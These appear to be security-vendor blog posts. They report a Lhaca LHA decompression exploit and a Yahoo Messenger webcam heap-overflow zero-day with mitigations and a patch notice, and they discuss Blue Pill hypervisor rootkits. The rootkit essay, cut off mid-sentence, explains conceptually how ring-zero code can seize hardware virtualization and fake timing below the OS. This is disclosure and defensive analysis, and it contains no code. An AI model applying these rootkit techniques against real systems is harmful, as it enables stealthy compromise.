Two months ago, we published information about an exploit against a free LHA decompression tool, Lhaca, which is quite popular in Japan.

Whilst these tools may not be as widely used as commercial tools, the perception could be that such free tools are not worth targeting and are safe to use. Exploit-LHAZ.a is just a reminder that software, Windows or MacOS, English or localized, free, open source or commercial, is subject to the same security threats.

More details of Exploit-LHAZ.a at http://vil.nai.com/vil/content/v_142976.htm.

Update: More on the Yahoo Messenger Webcam Zero-Day

[UPDATE]
Yahoo has fixed its Webcam vulnerability. The patches for the Webcam vulnerabilities have been released by Yahoo. We urge Yahoo Messenger users to download the latest Messenger. Thanks to the Yahoo security team for working with us to resolve this issue in a short time. Here’s what you need to know.

[Original blog:]
Earlier today Karthik blogged about details of a new zero day in Yahoo! Messenger being published on some security forums in China. We got a chance to dig a bit deeper into this and were able to reproduce the vulnerability on Yahoo! Messenger version 8.1.0.413 based on the information provided in the forum. It seems like a classic heap overflow which can be triggered when the victim accepts a webcam invite. Note that this vulnerability is different from the recently patched one in June which exploited the Yahoo! Webcam ActiveX controls.

We’ve been able to reach Yahoo! security team and have informed them about this issue. 

We recommend the following to users using Yahoo! Messenger Webcam:

1) Don’t accept webcam invites from untrusted sources until a patch for this is released.

2) It’s advisable to block outgoing traffic on TCP port 5100 until the vendor patches this vulnerability.

To mitigate this, we’re releasing our NIPS IntruShield signatures today to protect Yahoo! Messenger users from this threat. We shall keep on monitoring this threat and update if we come across anything.

Potential Yahoo Messenger Zero-Day

A post on a Chinese-language security forum claims that there is a zero-day vulnerability in Yahoo Messenger. Researchers at Avert Labs have found that this flaw may allow for user-assisted remote-code execution attacks. No code exploiting this flaw has been published yet.

We’re currently working with Yahoo to be able to confirm or deny that this is a zero-day.

We’ll keep you updated.

The truths and myths about Blue Pill and virtualized malware

We have been studying the issue of malicious hypervisors for quite some time at McAfee Avert Labs and have come up with several techniques to detect whether the system runs on top of a hypervisor or whether there is a piece of code that is trying to initiate a hypervisor. Our work included, of course, analyzing things like Blue Pill and other similar malicious hypervisors.

Last week I was at BlackHat, and it was a very exciting week in terms of Blue Pill and the virtualization rootkits issue in general. During the BlackHat 2007 Briefings in Las Vegas there were three interesting sessions that relate to virtualization system security and rootkits. I attended those three sessions and had a chance to chat some with three presenters. The main points I would emphasize are the following:

  1. Providing a system virtualization facility at the processor level without applying any sound security policy is a serious design flaw.
  2. A malware author’s job is to leverage system design flaws, and hence virtualization rootkits were very much expected, including Blue Pill.
  3. There is no rootkit that is undetectable, even if it installs itself as a hypervisor. The challenge is always in how to repair rootkits once they control some layer in the system architecture.
  4. There needs to be a more organized effort between hardware virtualization vendors, software hypervisor providers and security companies to ensure the secure deployment of virtualization solutions.

Now before I go into what happened during the three sessions at BlackHat, I would like to provide our readers with some background and personal thoughts about this topic. Less than two years ago, both Intel and AMD started to provide virtualization support at the processor level. This support is essentially comprised of a set of processor enhancements that improve traditional software-based virtualization solutions. These integrated features give virtualization software, namely Virtual Machine Monitors (VMMs) and hypervisors, the ability to offload workloads to the system hardware, enabling more streamlined virtualization software stacks and “near native” performance characteristics. For instance, virtualization-enabled processors allow VMMs to rely on the hardware for isolating and mapping memory between virtual machines. This is achieved by adding another level of indirection for mapping VM-based physical addresses to host-based physical addresses. Both Intel and AMD also provide an additional level of indirection for mapping VM I/O addresses to host I/O physical addresses. Virtualizing memory addresses and I/O addresses at the processor level is a great extension that minimizes the work done by today’s software hypervisors.

However, in doing that, neither Intel nor AMD considered the security risk of providing such a powerful facility in the hardware with no restriction on which piece of software could take advantage of it. In theory there have been lots of publications about the safer computing initiative and how to use TPM technology to authenticate the piece of software that is initializing the processor into virtualization mode. But in reality, this was not provided in the first release of the virtualization-aware processors, as hypervisor authentication was not provided at the firmware or BIOS level.

Now think of that with me for a moment: we now have a very powerful, unlocked facility in the processor that allows any piece of software running in ring zero (like a device driver) to initialize a processor-supported hypervisor and hence take control of the whole computing environment, including the operating system. Yes, this is true, and it was a serious design flaw. Of course both Intel and AMD designers assumed that operating system kernel developers are the only ones who would care about virtualization and would use that facility provided by their processors, which turned out to be untrue. Joanna Rutkowska (the Blue Pill author) and other people have demonstrated some sample code that would initiate a hypervisor, and since it runs outside the operating system it can be considered a rootkit. But as the reader may understand now, there are no secrets there. No undocumented stuff; it is all about a powerful hardware feature that was not protected by any security policy.

Now to make the situation worse, both Intel and AMD are competing in that space and I guess both are trying to get software virtualization vendors to rely on their processors’ native virtualization support. But software-based hypervisors do more than memory and I/O virtualization. They do binary translation, for instance, which allows them to control program execution at the instruction level and control programs’ responses to system interrupts. To accommodate that need, both Intel and AMD provide the ability to exit from the VM to the VMM when a certain instruction is executed or a certain condition takes place inside the VM. For hackers this is a very lucrative feature, so not only can they install a thin hypervisor but they can also control the execution of certain instructions and fake many things from below the operating system, like timestamp counters which used to be a very reliable method for measuri